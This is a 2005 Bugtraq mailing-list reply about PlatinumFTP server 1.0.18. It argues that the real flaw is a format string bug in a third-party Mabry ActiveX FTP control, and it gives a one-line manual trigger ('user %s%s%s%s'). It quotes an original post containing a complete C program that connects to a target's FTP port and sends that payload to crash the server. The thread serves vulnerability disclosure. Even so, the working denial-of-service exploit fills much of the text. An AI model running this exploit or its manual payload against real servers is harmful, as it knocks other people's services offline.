Re: PlantinumFTP server <= 1.0.18 Remote DOS exploit

["Gary H. Jones II" <gary () pointblanksecurity com>]

I replied back to ports original advisory about this on another mailing
list.
The real issue here is a format string vulnerability.

That software uses an FTP server ActiveX control made by Mabry Software.
Any ftp server that uses this ActiveX control is likely vulnerable.

The ActiveX control is the cause of these bugs, not the PlatinumFTP software
itself.  When I took a look at the software, I noticed it was written in
VB5,
finding a format string in a VB program would be a *very* rare find.
Knowing that, I figured there would be a 3rd party control within the
software that
was written in C++.

I ran it through a debugger, passed a few %s and watched it crash. The
title of the error message is "Mabry Socket Window:
PlatinumFTPserverEngine.exe - Application Error", this is what lead to the
discovery of the real issue.

I downloaded the latest sample/demo of this ActiveX, and it is still
vulnerable when you run VBSampleOCX.exe.
Available here http://www.mabry.com/ftpserv/index.htm.

There has been an advisory released already for this ActiveX control.
http://secunia.com/advisories/10608/

I think this DoS "exploit" is a bit overkill, an attacker can telnet to the
vulnerable ftp daemon, type "user %s%s%s%s" and press enter for the same
effect.

Gary H. Jones II



----- Original Message ----- 
From: "Exoduks" <exoduks () gmail com>
To: <bugtraq () securityfocus com>
Sent: Monday, March 14, 2005 7:47 AM
Subject: PlantinumFTP server <= 1.0.18 Remote DOS exploit




Here is simple exploit for PlantinumFTP server DOS bug.

/*
 * PlantinumFTP server <= 1.0.18 Remote DOS exploit
 * -------------------------------------------------
 * PlantinumFTP server exploit for Remote Denial of Service bug
 * in PlantinumFTP founded by ports.
 *
 * Coded by Exoduks - exoduks[at]gmail.com
 * HackGen Team - www.hackgen.org
 *
 * Compile: gcc -o pFTP_dos pFTP_dos.c
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 21

int main(int argc, char **argv)
{
    char buffer[50];
    char *host_ip;
    int mysock;
    struct sockaddr_in name;
    struct hostent *myhost;

    printf("\n PlantinumFTP server <= 1.0.18 Remote DOS exploit\n");
    printf(" -------------------------------------------------\n");
    printf(" Coded by Exoduks - exoduks[at]gmail.com\n");
    printf(" HackGen Team - www.hackgen.org\n");
    printf(" -------------------------------------------------\n");

    printf(" [+] Creating socket !\n");
    mysock = socket(PF_INET, SOCK_STREAM, 0);
    if (mysock == -1) {
        printf("[-] Socket error !\n");
        return 1;
    }

    host_ip = argv[1];

    if (host_ip == NULL) {
        printf(" [-] Host error ! - Usage: %s <ip/host> !\n\n", argv[0]);
        return 1;
    }

    myhost = gethostbyname(host_ip);

    name.sin_family = AF_INET;
    name.sin_addr = *((struct in_addr*) myhost->h_addr);
    name.sin_port = htons(PORT);

    printf(" [+] Connecting to target on port %d!\n", PORT);
    if (connect (mysock, (struct sockaddr*)&name, sizeof(struct
sockaddr_in)) == -1) {
        printf(" [-] Connection error !\n");
        return 2;
    }

    printf(" [+] Sending exploit !\n");
    sprintf(buffer, "%s", "USER %s%s%s%s\r\n");
    write(mysock, buffer, strlen(buffer));
    printf(" [+] Exploit sent !\n\n");

    close(mysock);

    return 0;
}